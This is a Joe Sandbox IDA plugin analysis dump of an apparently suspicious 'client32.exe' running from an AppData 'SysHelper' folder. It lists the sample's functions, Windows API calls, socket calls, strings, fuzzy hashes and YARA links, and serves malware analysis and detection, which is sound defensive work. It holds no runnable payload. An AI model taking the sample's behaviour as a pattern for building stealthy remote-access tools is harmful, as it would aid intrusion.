Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Event$Create$__wcstoi64_memsetwsprintf
String ID: Client$DisableGeolocation
API String ID: 2598271332-4166767992
Opcode ID: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
Opcode Fuzzy Hash: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84

Function 11026E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A

Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,75C0A1D0,75BF3760,75BF7A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34

TranslateMessage.USER32(?), ref: 11026E60
DispatchMessageA.USER32(?), ref: 11026E66

Strings

Exit Msgloop, quit=%d, xrefs: 11026E9D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
String ID: Exit Msgloop, quit=%d
API String ID: 3212272093-2210386016
Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2

Function 1110C420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1110C454

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

_memset.LIBCMT ref: 1110C477

Strings

..\ctl32\Refcount.cpp, xrefs: 1110C465
Can't alloc %u bytes, xrefs: 1110C44E

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$ErrorExitLastMessageProcess_memset
String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
API String ID: 1322847840-2664294811
Opcode ID: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
Opcode Fuzzy Hash: 3a706ac0cd119f38acec977a3592e350be6868ab0f23c6a029c7efd4c141a840
Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5

Function 11017610 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1101761D

Part of subcall function 11017520: WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 1101755C
Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0

Part of subcall function 11017440: WaitForSingleObject.KERNEL32(000002F4,000000FF), ref: 11017472
Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500

SetEvent.KERNEL32(000002F4), ref: 1101763D
GetTickCount.KERNEL32 ref: 11017643

Strings

touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountInitializeObjectSingleTickUninitializeWait$Event
String ID: touchkbd, systype=%d, chassis=%d, took %d ms
API String ID: 3357037191-4122679463
Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2

Function 68595000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
SetLastError.KERNEL32(00000078,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6859503D

Strings

GetModuleFileNameExA, xrefs: 6859500E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorFileLastModuleNameProc
String ID: GetModuleFileNameExA
API String ID: 4084229558-758377266
Opcode ID: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
Instruction ID: e23656c5dac0cf9fa05560afcc68164bbb297e952d00726f289e8e4ae625ec2a
Opcode Fuzzy Hash: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
Instruction Fuzzy Hash: 77F08272600218AFC720DF94E804E9B77A8EB48711F40451BFD45D7240C671F810CBF5

Function 68594FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
SetLastError.KERNEL32(00000078,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FED

Strings

EnumProcessModules, xrefs: 68594FBE

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: AddressEnumErrorLastModulesProcProcess
String ID: EnumProcessModules
API String ID: 3858832252-3735562946
Opcode ID: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
Instruction ID: c6008895448c7ea24cf5e3f5aa5c2c106650779afcf18f2532c2e3569412b958
Opcode Fuzzy Hash: 64f2bf0c1ee8cb5c044a969f9cad62c9aaf79525f1ba8bba44fefbd38ddb7876
Instruction Fuzzy Hash: 41F08C72650218AFCB20DFA8D844E9B77A8EB48721F40C81AFD6AD7740C670EC10CFA0

Function 11134C80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5

Strings

Client, xrefs: 11134C9C
*AutoICFConfig, xrefs: 11134C97

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateHandleThread__wcstoi64
String ID: *AutoICFConfig$Client
API String ID: 3257255551-59951473
Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D

Function 1106FD70 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000000FA), ref: 1106FDC7
EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6

Strings

Push, xrefs: 1106FD96

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleep
String ID: Push
API String ID: 1566154052-4278761818
Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92

Function 6859A4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
String ID:
API String ID: 4212191310-0
Opcode ID: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
Instruction ID: 535f9a0d7001d5bb9c61b1ab5c8456b419707014113600a3913e4554816d070a
Opcode Fuzzy Hash: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
Instruction Fuzzy Hash: BC21AAB6E00650EFDF129F18C8456DEB7FAEF86315F824417DC65A3240D771A9408B66

Function 68595C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(97A234B3,4004667F,00000000,a3Zh), ref: 68595D1F
select.WSOCK32(00000001,?,00000000,?,00000000,97A234B3,4004667F,00000000,a3Zh), ref: 68595D62

Strings

a3Zh, xrefs: 68595D0E

Memory Dump Source

Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true

Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_68590000_client32.jbxd

Yara matches

Similarity

API ID: ioctlsocketselect
String ID: a3Zh
API String ID: 1457273030-2278443015
Opcode ID: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
Instruction ID: f4d72408498c597f28c5e98b0793ceec49d4e0105455f2fa7991f5df7ed328ba
Opcode Fuzzy Hash: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
Instruction Fuzzy Hash: 54210E71A003189BEB28DF14C9657EDB7B9EF88305F4081EAA80A97281DB745F94DF90

Function 11140290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SysHelper\client32.exe,00000104,?,111404E3,?), ref: 111402B9

Strings

C:\Users\user\AppData\Roaming\SysHelper\client32.exe, xrefs: 111402A4, 111402B2

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess
String ID: C:\Users\user\AppData\Roaming\SysHelper\client32.exe
API String ID: 2251294070-1429985935
Opcode ID: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
Opcode Fuzzy Hash: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791

Function 110151B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
CloseHandle.KERNEL32(00000000), ref: 110151D8

Strings

\\.\NSWFPDrv, xrefs: 110151C2

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseCreateFileHandle
String ID: \\.\NSWFPDrv
API String ID: 3498533004-85019792
Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1

Function 111585E0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 11158603

Memory Dump Source

Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
